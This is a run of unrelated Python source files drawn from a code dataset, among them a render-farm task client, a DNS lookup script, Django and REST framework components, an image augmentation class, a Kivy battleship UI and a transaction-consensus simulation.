优先级\n#StartFrame 开始帧数\n#EndFrame 结束帧数\n#Step 步长,默认1\n#TaskName 任务名 \n#RenderName 渲染软件的名字\n#InputPath 输入文件夹路径,若为hip文件则为hip文件的绝对路径\n#InputFileName 生成文件前缀\n#OutputPath 输出文件夹的路径,默认空\n#Misc 若为hip文件填写渲染器路径,默认空\n#Server 渲染服务器的地址,默认172.16.252.47\n#Port 渲染服务器端口,默认44331\ndef onAddTask(type, Priority, TaskName, RenderName, StartFrame, EndFrame, Step=1, InputPath='', InputFileName='', OutputPath='', Misc='', Server='172.16.252.47', Port=44331):\n AddTime = int(time.time())\n RenderStartTime = 0\n RenderStopTime = 0\n id = 4294967295 - random.randrange(1000000 - 1)\n FrameCount = EndFrame - StartFrame + 1\n\n sockobj = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sockobj.connect((Server, Port))\n sockname = sockobj.getsockname()\n OwnerIpv4Addr = struct.unpack(\"!I\", socket.inet_aton(sockname[0]))[0]\n\n cmd_data = rencmd_mux_add_task_cmd_data(id,\n type,\n OwnerIpv4Addr,\n Priority,\n StartFrame,\n FrameCount,\n Step,\n AddTime,\n RenderStartTime,\n RenderStopTime,\n TaskName,\n RenderName,\n InputPath,\n InputFileName,\n OutputPath,\n Misc)\n\n cmd = rencmd_mux_cmd(devtypes.devtype_workstation,\n cmdids.cmd_render_task,\n INVALIDE_ID,\n OwnerIpv4Addr,\n cmd_data,\n None)\n \n sockobj.send(cmd)\n sockobj.close()\n return True\n\nclass render_name:\n ifd = 'houdini ifd render'\n hip = 'houdini project render'\n simulation = 'houdini simulation render'\n\nclass render_task_type:\n tasktype_ifd = 0\n tasktype_houdini_proj = 1\n tasktype_maya_proj = 3\n tasktype_simulation = 4\n tasktype_houdini_proj_derived = 5\n\n\nclass devtypes:\n devtype_schedule_svr = 0\n devtype_render_node = 1\n devtype_admin_tool = 2\n devtype_workstation = 3\n\n\nclass cmdidsEnum:\n __cmdids_num = 0\n def get_enum_num(self):\n cur = self.__cmdids_num\n self.__cmdids_num = self.__cmdids_num + 1\n return cur\n \nclass cmdids:\n enum = cmdidsEnum()\n cmd_node_register = enum.get_enum_num()\n cmd_response_node_register = enum.get_enum_num()\n cmd_login = enum.get_enum_num()\n cmd_response_login = enum.get_enum_num()\n cmd_node_is_busy = enum.get_enum_num()\n cmd_new_node = enum.get_enum_num()\n cmd_render_log = enum.get_enum_num()\n cmd_sub_render_successed = enum.get_enum_num()\n cmd_render_successed = enum.get_enum_num()\n cmd_render_nodes = enum.get_enum_num()\n cmd_render_task = enum.get_enum_num()\n cmd_response_render_task = enum.get_enum_num()\n cmd_unprocess_tasks = enum.get_enum_num()\n cmd_processing_tasks = enum.get_enum_num()\n cmd_processed_tasks = enum.get_enum_num()\n cmd_render_task_invalid = enum.get_enum_num()\n cmd_node_status_changed = enum.get_enum_num()\n cmd_node_working = enum.get_enum_num()\n cmd_sub_task_changed = enum.get_enum_num()\n cmd_sub_tasks_of_task = enum.get_enum_num()\n cmd_sub_task_rerender = enum.get_enum_num() \n cmd_sub_task = enum.get_enum_num() \n cmd_delete_tasks = enum.get_enum_num()\n cmd_tasks_deleted = enum.get_enum_num()\n cmd_stop_render_task = enum.get_enum_num()\n cmd_derive_task_created = enum.get_enum_num()\n\ndef rencmd_mux_add_task_cmd_data(task_id,\n type,\n OwnerIpv4Addr,\n Priority,\n StartFrame,\n FrameCount,\n Step,\n AddTime,\n RenderStartTime,\n RenderStopTime,\n TaskName,\n RenderName,\n InputPath,\n InputFileName,\n OutputPath,\n Misc):\n \n fmt = '=IIIBHHHIIIH{0}sH{1}sH{2}sH{3}sH{4}sH{5}s'.format(len(TaskName),\n len(RenderName),\n len(InputPath),\n len(InputFileName),\n len(OutputPath),\n len(Misc))\n return struct.pack(fmt,\n task_id,\n type,\n OwnerIpv4Addr,\n Priority,\n StartFrame,\n FrameCount,\n Step,\n AddTime,\n RenderStartTime,\n RenderStopTime,\n len(TaskName), TaskName,\n len(RenderName), RenderName,\n len(InputPath), InputPath,\n len(InputFileName), InputFileName,\n len(OutputPath), OutputPath,\n len(Misc), Misc)\n\ncmd_header_fmt='6I'\ncmd_header_len=struct.calcsize(cmd_header_fmt)\n\ndef rencmd_mux_cmd(dev_type, cmdid, sender_id, ipv4addr, cmd_data, cmd_extra_data):\n global cmd_header_fmt\n\n cmd_data_len = 0\n cmd_extra_data_len = 0\n if cmd_data:\n cmd_data_len = len(cmd_data)\n if cmd_extra_data:\n cmd_extra_data_len = len(cmd_extra_data)\n\n cmd_buf = struct.pack(cmd_header_fmt, dev_type, cmdid, sender_id, ipv4addr, cmd_data_len, cmd_extra_data_len)\n if cmd_data:\n cmd_buf += cmd_data\n if cmd_extra_data:\n cmd_buf += cmd_extra_data\n return cmd_buf\n","sub_path":"cgPipeline/test/AddTask.py","file_name":"AddTask.py","file_ext":"py","file_size_in_byte":6602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"102225758","text":"'''\nProgram that takes in user input of a domain name and utilizes 'dig' similar to terminal command, which prints out a query from CNAME to A\n\nsource: http://www.dnspython.org/examples.html\nhttps://stackoverflow.com/questions/5235569/using-the-dig-command-in-python\nAuthor: Benny Fung\n'''\nimport socket\nimport argparse\nimport dns.resolver, sys\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n group = parser.add_mutually_exclusive_group(required=True)\n group.add_argument('-d', help = \"Enter domain name [ex: www.yahoo.com]\")\n return parser.parse_args()\n\ndef dig(arg): #recursively prints out data from CNAME to A\n\thost = arg\n\ttry:\n\t\twhile True:\n\t\t\tfor rdata in dns.resolver.query(arg, 'CNAME'):\n\t\t\t\tprint(rdata.target)\n\t\t\t\thost = rdata.target\n\texcept:#recursively prints out data from CNAME to A\n\t\tfor rdata in dns.resolver.query(host):\n\t\t\tprint(rdata)\n\nif __name__ == '__main__':\n arg = parse_args()\n dig(arg)\n\n","sub_path":"dns.py","file_name":"dns.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"516603709","text":"# Define here the models for your scraped items\n#\n# See documentation in:\n# http://doc.scrapy.org/en/latest/topics/items.html\n\nfrom scrapy.item import Item, Field\n\n\n\"\"\"\n ==== SCRAPING\n\n 1. get all urls A-Z\n 2. get all job links within each category\n 3. follow each link and get metadata per job title (where applicable):\n -location\n -date\n -company\n -description\n -requirements\n -snapshot\n -pay\n -other pay\n -employment type\n -job type\n -education\n -experience\n -manages others\n -relocation\n -industry\n -required travel\n -job ID\n 4. follow 'apply link' and find all fields:\n -field label\n -field input\n\n expected output:\n\n {jobs: [\n {\n 'title': 'FOO',\n 'url': 'url',\n 'metadata': {\n 'keys': 'values'\n },\n formfields: {\n 'keys': 'values'\n }\n }\n ]}\n\n 5. compile and output to file, PER job\n\n 6. **OPTIONAL** graph output to find correlations\n\n ==== ANALYSIS\n\"\"\"\n\n\nclass JobDetail(Item):\n # define the fields for your item here like:\n url = Field()\n location = Field()\n date = Field()\n company = Field()\n description = Field()\n requirements = Field()\n snapshot = Field()\n pay = Field()\n other_pay = Field()\n employment_type = Field()\n job_type = Field()\n education = Field()\n experience = Field()\n manages_others = Field()\n relocation = Field()\n industry = Field()\n required_travel = Field()\n job_ID = Field()\n requirements = Field()\n","sub_path":"jobs/items.py","file_name":"items.py","file_ext":"py","file_size_in_byte":1811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"639805415","text":"\nfrom rest_framework.test import APITestCase\n\nfrom .testapp import models\n\n\nclass BackendTest(APITestCase):\n\n @classmethod\n def setUpTestData(cls):\n models.User.objects.create(username=\"user1\", email=\"user1@example.org\")\n models.User.objects.create(username=\"user2\", email=\"user2@example.org\")\n\n def test_django_filter_compatibility(self):\n response = self.client.get('/df-users/', {'username': 'user1'}, content_type='json')\n\n self.assertEqual(len(response.data), 1)\n self.assertEqual(response.data[0]['username'], 'user1')\n","sub_path":"tests/test_backends.py","file_name":"test_backends.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"417850843","text":"#!/usr/bin/env python\n\n\nfrom __future__ import print_function \nimport skimage as sk\nimport cv2\nimport numpy as np\nimport os\nimport random\nfrom yaml_reader import YamlReader \n\n\nclass Augment(YamlReader):\n def __init__(self,\n yaml_file = 'augment_config.yaml'):\n self.image_files = []\n self.keep_images = ['resized', 'augment', 'flipped',\n 'rot']\n super(Augment, self).__init__(yaml_file)\n self.parse()\n self._load_images()\n\n\n def _load_images(self):\n files = os.listdir(self.image_dir)\n exts = ['png', 'jpg', 'PNG', 'JPG', 'jpeg', 'tiff']\n not_load = ['resiz', 'augm', 'flip', 'gray']\n # the last filter is to avoid loading processed images\n self.image_files =\\\n [os.path.join(self.image_dir, f) for f in files\n if f.split('.')[-1] in exts and not\n any(ff in f for ff in not_load)]\n\n\n def do_grayscale(self):\n if not self.flag_gray:\n return\n for i, f in enumerate(self.image_files):\n bgr = cv2.imread(f)\n gray = cv2.cvtColor(bgr, cv2.COLOR_BGR2GRAY)\n if self.flag_equalise:\n gray = cv2.equalizeHist(gray)\n cv2.imwrite(os.path.join(\n self.image_dir, \"gray_%04d.png\" %i ), gray)\n\n\n def do_resize(self):\n files = [f for f in os.listdir(self.image_dir) \n if 'gray' in f or 'flip' in f]\n for i, f in enumerate(files):\n im = cv2.imread(os.path.join((self.image_dir), f))\n res = cv2.resize(im,\n (self.resized_width, self.resized_height))\n cv2.imwrite(os.path.join(self.image_dir,\n \"resized_%04d.png\" %i ), res)\n\n\n def do_flip(self, substr = 'gray'):\n if not self.flag_flip:\n return\n files = [f for f in os.listdir(self.image_dir) \n if substr in f]\n for f in files:\n im = cv2.imread(os.path.join((self.image_dir), f))\n im = im[:, ::-1]\n cv2.imwrite(os.path.join(self.image_dir,\n f.split('.')[0] + \"_flipped\" + \".png\"), im)\n\n\n def do_augment(self): \n files = [f for f in os.listdir(self.image_dir)\n if 'resized' in f]\n assert len(files) > 0,\\\n \"do_augment() operates on resized files.\\\n Call do_resize() first.\"\n for i, f in enumerate(files):\n im = cv2.imread(os.path.join(self.image_dir, f))\n for r in range(self.n_rotations):\n random_degree = random.uniform(self.min_angle,\n self.max_angle)\n im = sk.transform.rotate(im,\n random_degree, mode = 'edge')\n if self.flag_noise:\n im = sk.util.random_noise(im)\n im = np.array(255 * im, np.uint8)\n cv2.imwrite(os.path.join(self.image_dir,\n \"augmented_%04d_rot_%03d.png\" %(i,r) ), im)\n\n\n def do_clean(self):\n for f in self.image_files:\n if all(k not in f for k in self.keep_images):\n os.remove(f)\n","sub_path":"tools/augment.py","file_name":"augment.py","file_ext":"py","file_size_in_byte":3145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"144335213","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\nDEFAULT = 'None'\n\n\ndef give_existing_records_sane_defaults(apps, schema_editor):\n # Clean up any records with blank strings. Nulls are handled by AlterField.\n school_class = apps.get_model('web', 'School')\n school_class.objects.select_for_update()\\\n .filter(mediasite_root_folder='')\\\n .update(mediasite_root_folder=DEFAULT)\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('web', '0006_auto_20160604_0814'),\n ]\n\n operations = [\n # The AlterField migration below doesn't automatically convert blank\n # strings saved in the DB to 'None' (it only handles null fields), so\n # we need to clean these fields up manually.\n migrations.RunPython(\n code=give_existing_records_sane_defaults,\n reverse_code=migrations.RunPython.noop,\n ),\n # Note there are NO defaults set in the actual model, because we don't\n # want users or code to add web_school records without specifying a\n # root folder, so this migration performs cleanup of the existing\n # records in the table to ensure there are no blank\n # mediasite_root_folder fields, without persisting a default in the\n # model itself. The user is responsible for fixing the\n # data so it makes sense (i.e. so that integrations which shouldn't be\n # using 'None' as the root folder are updated manually or removed from\n # the database entirely); the timing of this manual cleanup can be\n # independent of the actual migration.\n migrations.AlterField(\n model_name='school',\n name='mediasite_root_folder',\n field=models.TextField(\n null=False, # do not allow empty field (DB-level constraint)\n blank=False, # do not allow empty strings in field\n # (Django only; not a DB-level constraint)\n default=DEFAULT), # temporary default for migration only\n preserve_default=False # default is not permanent in model\n ),\n ]\n","sub_path":"web/migrations/0007_mediasite_root_folder_required_20161019_1943.py","file_name":"0007_mediasite_root_folder_required_20161019_1943.py","file_ext":"py","file_size_in_byte":2175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"635910749","text":"from rest_framework.serializers import (\n ModelSerializer,\n HyperlinkedIdentityField,\n HyperlinkedModelSerializer,\n SerializerMethodField,\n CharField,\n)\n\nfrom posts.models import Post\nfrom tags.models import (\n AlcoholTag,\n FoodTag,\n PlaceTag,\n)\n\nalcohol_tag_detail_url = HyperlinkedIdentityField(\n view_name='apis:tags:alcohol-detail',\n lookup_field='pk',\n)\n\nfood_tag_detail_url = HyperlinkedIdentityField(\n view_name='apis:tags:food-detail',\n lookup_field='pk',\n)\n\nplace_tag_detail_url = HyperlinkedIdentityField(\n view_name='apis:tags:place-detail',\n lookup_field='pk',\n)\n\n\nclass PostSerializer(ModelSerializer):\n url = SerializerMethodField()\n\n class Meta:\n model = Post\n fields = [\n 'url',\n 'id',\n 'content',\n ]\n\n def get_url(self, obj):\n absolute_url = Post.get_absolute_api_url(obj)\n full_url = \"https://\" + \"sooljotta.com\" + absolute_url\n return full_url\n\n\nclass AlcoholTagSerializer(ModelSerializer):\n url = SerializerMethodField()\n\n class Meta:\n model = AlcoholTag\n fields = [\n 'url',\n 'id',\n 'alcohol_name',\n ]\n\n def get_url(self, obj):\n absolute_url = AlcoholTag.get_absolute_api_url(obj)\n full_url = \"https://\" + \"sooljotta.com\" + absolute_url\n return full_url\n\n\nclass AlcoholTagDetailSerializer(ModelSerializer):\n posts = SerializerMethodField()\n\n class Meta:\n model = AlcoholTag\n fields = [\n 'id',\n 'alcohol_name',\n 'posts',\n ]\n\n def get_posts(self, obj):\n post_queryset = obj.post_set.all()\n posts = PostSerializer(post_queryset, many=True).data\n return posts\n\n\nclass AlcoholTagGeneralSerializer(ModelSerializer):\n\n class Meta:\n model = AlcoholTag\n fields = [\n 'id',\n 'alcohol_name',\n ]\n\n\nclass FoodTagSerializer(ModelSerializer):\n url = SerializerMethodField()\n\n class Meta:\n model = FoodTag\n fields = [\n 'url',\n 'id',\n 'food_name',\n ]\n\n def get_url(self, obj):\n absolute_url = FoodTag.get_absolute_api_url(obj)\n full_url = \"https://\" + \"sooljotta.com\" + absolute_url\n return full_url\n\n\nclass FoodTagDetailSerializer(ModelSerializer):\n posts = SerializerMethodField()\n\n class Meta:\n model = FoodTag\n fields = [\n 'id',\n 'food_name',\n 'posts',\n ]\n\n def get_posts(self, obj):\n post_queryset = obj.post_set.all()\n posts = PostSerializer(post_queryset, many=True).data\n return posts\n\n\nclass FoodTagGeneralSerializer(ModelSerializer):\n\n class Meta:\n model = FoodTag\n fields = [\n 'id',\n 'food_name',\n ]\n\n\nclass PlaceTagSerializer(ModelSerializer):\n url = SerializerMethodField()\n\n class Meta:\n model = PlaceTag\n fields = [\n 'url',\n 'id',\n 'place_name',\n ]\n\n def get_url(self, obj):\n absolute_url = PlaceTag.get_absolute_api_url(obj)\n full_url = \"https://\" + \"sooljotta.com\" + absolute_url\n return full_url\n\n\nclass PlaceTagDetailSerializer(ModelSerializer):\n\n posts = SerializerMethodField()\n\n class Meta:\n model = PlaceTag\n fields = [\n 'id',\n 'place_name',\n 'posts',\n ]\n\n def get_posts(self, obj):\n post_queryset = obj.post_set.all()\n posts = PostSerializer(post_queryset, many=True).data\n return posts\n\n\nclass PlaceTagGeneralSerializer(ModelSerializer):\n\n class Meta:\n model = PlaceTag\n fields = [\n 'id',\n 'place_name',\n ]\n","sub_path":"sooljottagrae/apis/serializers/tag.py","file_name":"tag.py","file_ext":"py","file_size_in_byte":3966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"525810899","text":"#coding:utf-8\n\nimport os, sys\nsys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))\n\nfrom random import randint\nfrom models import User, Pet, Photo\n\nuser = User.objects().first()\n\ncat = Pet()\ncat.name = 'kity'\ncat.avatar_url = 'http://www.ermiao.com/media/uploads/avatar/2a13363c7ddd4d2ca827fc477543cec6_resized.jpg'\ncat.user = user\ncat.pet_type = 0\ncat.save()\n\ndog = Pet()\ndog.name = 'gou'\ndog.avatar_url = 'http://www.ermiao.com/media/uploads/avatar/2a13363c7ddd4d2ca827fc477543cec6_resized.jpg'\ndog.user = user\ndog.pet_type = 1\ndog.save()\n\nfor i in xrange(100):\n photo = Photo()\n photo.image_url = 'http://www.ermiao.com/media/uploads/pet/6fc6b40c00634c7e81676e4a14bb86ea_resized_w_160.jpg'\n photo.pet = cat\n photo.pet_type = cat.pet_type\n photo.user = user\n photo.text = u\"喵喵\"\n photo.like_count = randint(0,30)\n photo.save()\n\nfor i in xrange(50):\n photo = Photo()\n photo.image_url = 'http://www.ermiao.com/media/uploads/pet/a72c98f9626b45308679069c93d714a8_resized_w_450.jpg'\n photo.pet = dog\n photo.pet_type = dog.pet_type\n photo.user = user\n photo.text = u\"汪汪\"\n photo.like_count = randint(0,25)\n photo.save()\n","sub_path":"flask_example/ermiao/make_data.py","file_name":"make_data.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"596818697","text":"from __future__ import print_function\nimport random\nfrom Node import *\nfrom catx import *\nfrom Transaction import *\nfrom Candidate import *\n\ndef main(args):\n##\n##\n## // There are four required command line arguments: p_graph (.1, .2, .3),\n## // p_malicious (.15, .30, .45), p_txDistribution (.01, .05, .10), \n## // and numRounds (10, 20). You should try to test your CompliantNode\n## // code for all 3x3x3x2 = 54 combinations.\n## \n numNodes = 100;\n p_graph = float(args[1]) # // parameter for random graph: \n # // prob. that an edge will exist\n p_malicious = float(args[2]) # // prob. that a node will be set to be malicious\n p_txDistribution = float(args[3]) #// probability of assigning an initial transaction to each node \n numRounds = float(args[4]) #// number of simulation rounds your nodes will run for\n\n # // pick which nodes are malicious and which are compliant\n nodes = [None for i in range(numNodes)]\n mal = 0\n com = 0\n for i in range(numNodes):\n if(random.random() < p_malicious):\n # // When you are ready to try testing with malicious nodes, replace the\n # // instantiation below with an instantiation of a MaliciousNode\n nodes[i] = MaliciousNode(p_graph, p_malicious, p_txDistribution, numRounds)\n mal = mal + 1\n else:\n nodes[i] = CompliantNode(p_graph, p_malicious, p_txDistribution, numRounds)\n com = com + 1\n \n print(\"{} malicious nodes and {} compliant nodes\".format(mal,com))\n\n followees = [[1 if random.random() < p_graph and i!= j else 0 for i in range(numNodes)] for j in range(numNodes)]\n for i in range(numNodes):\n nodes[i].setFollowees(followees[i]);\n\n## // initialize a set of 500 valid Transactions with random ids\n numTx = 500\n validTxIds = []\n for i in range(numTx):\n validTxIds.append(random.randint(1000,50000))\n \n\n##\n## // distribute the 500 Transactions throughout the nodes, to initialize\n## // the starting state of Transactions each node has heard. The distribution\n## // is random with probability p_txDistribution for each Transaction-Node pair.\n\n for i in range(numNodes):\n pendingTransactions = []\n for txid in validTxIds:\n if (random.random() < p_txDistribution): #// p_txDistribution is .01, .05, or .10.\n pendingTransactions.append(Transaction(txid))\n nodes[i].setPendingTransaction(pendingTransactions)\n\n numRounds = int(numRounds)\n for round in range(numRounds):\n## // gather all the proposals into a map. The key is the index of the node receiving\n## // proposals. The value is an List containing pairs. The first\n## // element is the id of the transaction being proposed and the second\n## // element is the index # of the node proposing the transaction.\n allProposals = {}\n ## allProposals = { idx1: [cand1, cand2, ...], idx2: [...] }\n\n for i in range(numNodes):\n proposals = nodes[i].sendToFollowers()\n for tx in proposals:\n if (tx not in validTxIds):\n break #// ensure that each tx is actually valid\n\n for j in range(numNodes):\n if (not followees[j][i]):\n break ## tx only matters if j follows i\n\n if (j not in allProposals):\n allProposals[j] = [] ## key: j; value: [list]\n\n candidate = Candidate(tx, i)\n allProposals[j].append(candidate)\n \n## // Distribute the Proposals to their intended recipients as Candidates\n for i in range(numNodes):\n if (i in allProposals):\n nodes[i].receiveFromFollowees(allProposals.get(i));\n\n transactions = nodes[i].sendToFollowers()\n\n # save to file\n \n filename = \"results/\"+\"round_\"+str(round)+\"_node_\"+str(i)+\".txt\"\n f = open(filename,\"w+\")\n for tx in transactions:\n f.write(str(tx.id)+\"\\n\")\n f.close()\n \n \n \n\n # // print results\n for i in range(numNodes):\n transactions = nodes[i].sendToFollowers()\n print(\"Transaction ids that Node \" + str(i) + \" believes consensus on: \", end=\"\")\n '''\n for tx in transactions:\n print(\"{} \".format(tx.id), end='')\n print(\"\")\n '''\n print(\"{} transactions\".format(len(transactions)))\n\n\n\n\n\n\nif __name__ == '__main__':\n from sys import argv\n main(argv)","sub_path":"Assignment_2/py/simulation.py","file_name":"simulation.py","file_ext":"py","file_size_in_byte":4591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"70730559","text":"from kivy.app import App\nfrom kivy.uix.label import Label\nfrom kivy.uix.togglebutton import ToggleButton\nfrom kivy.uix.gridlayout import GridLayout\nfrom kivy.core.window import Window\nfrom win32api import GetSystemMetrics\nfrom kivy.config import Config\nfrom kivy.uix.textinput import TextInput\n\nimport src.Game as G\nimport src.Board as B\n\n\nclass BoardGrid(GridLayout):\n def __init__(self, **kwargs):\n self.mode = kwargs.pop('mode')\n super(BoardGrid, self).__init__(**kwargs)\n self.cols = 10\n self.rows = 10\n self.fill_grid()\n\n def fill_grid(self):\n board = g.player1.board\n col = board.columns[:10]\n row = board.index\n\n if self.mode == 'player':\n board_list = board.iloc[:,:10].stack().tolist()\n if self.mode == 'opponent':\n board_list = board.iloc[:,12:].stack().tolist()\n print(self.mode)\n for i in board_list:\n self.btn = ToggleButton(text=str(i))\n self.add_widget(self.btn)\n self.btn.bind(on_press=self.pressed)\n\n\n def pressed(self,instance):\n winner = g.goRound()\n\n\nclass WindowGrid(GridLayout):\n def __init__(self):\n super(WindowGrid, self).__init__()\n #Window.size = (GetSystemMetrics(0),GetSystemMetrics(1))\n Window.size = (960,600)\n self.cols = 3\n self.rows = 3\n\n\n self.add_widget(Label(text='Your ships'))\n self.add_widget(Label(text=str(Window.size)))\n self.add_widget(Label(text='Opponent ships'))\n self.add_widget(BoardGrid(mode='player'))\n self.add_widget(Label(text=''))\n self.add_widget(BoardGrid(mode='opponent'))\n self.add_widget(Label(text=''))\n self.add_widget(Label(text=''))\n self.add_widget(Label(text=''))\n\n\n\nclass ShipsApp(App):\n def build(self):\n return WindowGrid()\n\nif __name__ == \"__main__\":\n b1 = B.Board('Computer 1')\n b2 = B.Board('Computer 2')\n g = G.Game(b1, b2)\n ShipsApp().run()\n","sub_path":"src/Window.py","file_name":"Window.py","file_ext":"py","file_size_in_byte":1993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"236113950","text":"import argparse\nimport os\nimport warnings\nfrom importlib import import_module\n\nwarnings.filterwarnings(\"ignore\")\n\n\ndef run_exp() -> None:\n exp_file_list = [e for e in os.listdir(\"src/exp\") if args.exp in e]\n assert len(exp_file_list) == 1\n exp_module: str = os.path.splitext(exp_file_list[0])[0] # [exp000] -> exp000\n module = import_module(f\"src.exp.{exp_module}.main\")\n print(f\"execute main in src/exp/{exp_module}/main.py\")\n module.main(args.debug) # type: ignore\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"-e\", \"--exp\", type=str, required=True, help=\"experiment filename\"\n )\n parser.add_argument(\"-d\", \"--debug\", action=\"store_true\", help=\"debug mode\")\n parser.set_defaults(func=run_exp)\n args = parser.parse_args()\n args.func()\n","sub_path":"scripts/_run/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"164115158","text":"from random import randint\n\nDESCRIPTION = 'Answer \"yes\" if given number is prime. Otherwise answer \"no\".'\n\n\ndef is_prime(n):\n if n <= 1:\n return False\n divisor = 2\n while divisor <= n / 2:\n if n % divisor == 0:\n return False\n break\n else:\n divisor += 1\n return True\n\n\ndef generate_answer_and_question():\n num = randint(1, 100)\n if is_prime(num):\n correct_answer = 'yes'\n else:\n correct_answer = 'no'\n question = str(num)\n return correct_answer, question\n","sub_path":"brain_games/games/prime.py","file_name":"prime.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"501599570","text":"\"\"\"\nDjango settings for testproject project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.7/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.7/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\n\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = '--1oh7*5-1_rr%*34^&@e^b59(vgv=zm1wt(wm1ga=pfm73(9i'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nTEMPLATE_DEBUG = True\n\nALLOWED_HOSTS = []\n\n\n# Application definition\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'djrichtextfield',\n 'testproject.testapp',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'testproject.urls'\n\nWSGI_APPLICATION = 'testproject.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.7/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),\n }\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.7/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.7/howto/static-files/\n\nSTATIC_URL = '/static/'\n\n\n# Use discover_runner for Django < 1.6\ntry:\n from django.test.runner import DiscoverRunner # noqa\nexcept ImportError:\n TEST_RUNNER = 'discover_runner.DiscoverRunner'\n\n\n# Django Rich Text Field\nTINYMCE_CONFIG = {\n 'js': ['//tinymce.cachefly.net/4.1/tinymce.min.js'],\n 'init_template': 'djrichtextfield/init/tinymce.js',\n 'settings': {\n 'menubar': False,\n 'plugins': 'link image table code',\n 'toolbar': 'formatselect | bold italic | removeformat |'\n ' link unlink image table | code',\n 'block_formats': 'Paragraph=p;Header 1=h1;Header 2=h2;Header 3=h3',\n 'width': 700\n },\n 'profiles': {\n 'mini': {\n 'toolbar': 'bold italic | removeformat'\n }\n }\n}\n\nCKEDITOR_CONFIG = {\n 'js': ['//cdn.ckeditor.com/4.4.4/standard/ckeditor.js'],\n 'init_template': 'djrichtextfield/init/ckeditor.js',\n 'settings': {\n 'toolbar': [\n {'items': ['Format', '-', 'Bold', 'Italic', '-', 'RemoveFormat']},\n {'items': ['Link', 'Unlink', 'Image', 'Table']},\n {'items': ['Source']}\n ],\n 'format_tags': 'p;h1;h2;h3',\n 'width': 700,\n },\n 'profiles': {\n 'mini': {\n 'toolbar': [\n {'items': ['Bold', 'Italic', '-', 'RemoveFormat']},\n ]\n }\n }\n}\n\nDJRICHTEXTFIELD_CONFIG = CKEDITOR_CONFIG\n","sub_path":"Django_RichField/django-richtextfield-master/testproject/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"159561114","text":"import random\nimport cProfile\n\n\n\ndef random_list_1(n):\n '''\n Best case: O(n) Worst case: O(infinity)\n If the random int is not in the new list every time it is called, the \n running time should be like a single iterating of the length which \n should have a running time of n.\n If the random int is already in the list, which if the randomness is \n perfect, every time it is called, the running time would take infinite \n time.\n\n :param n:\n :return:\n '''\n list_ = []\n while len(list_) < n:\n rand_ = random.randint(0,n)\n if rand_ not in list_:\n list_.append(rand_)\n return list_\n\n\ndef random_list_2(n):\n '''\n O(n ** 2)\n For every iteration of size n, preform a del which takes n time\n\n :param n:\n :return:\n '''\n list_ = []\n for i in xrange(n):\n list_.append(i)\n out_ = []\n\n while list_:\n random_n = random.randint(0,len(list_) - 1)\n random_member = list_[random_n]\n del(list_[random_n])\n out_.append(random_member)\n return out_\n\n\ndef random_list_3(n):\n '''\n O(n)\n n iterations to build list_ then shuffle which takes n time.\n\n :param n:\n :return:\n '''\n list_ = []\n for i in xrange(n):\n list_.append(i)\n random.shuffle(list_)\n return 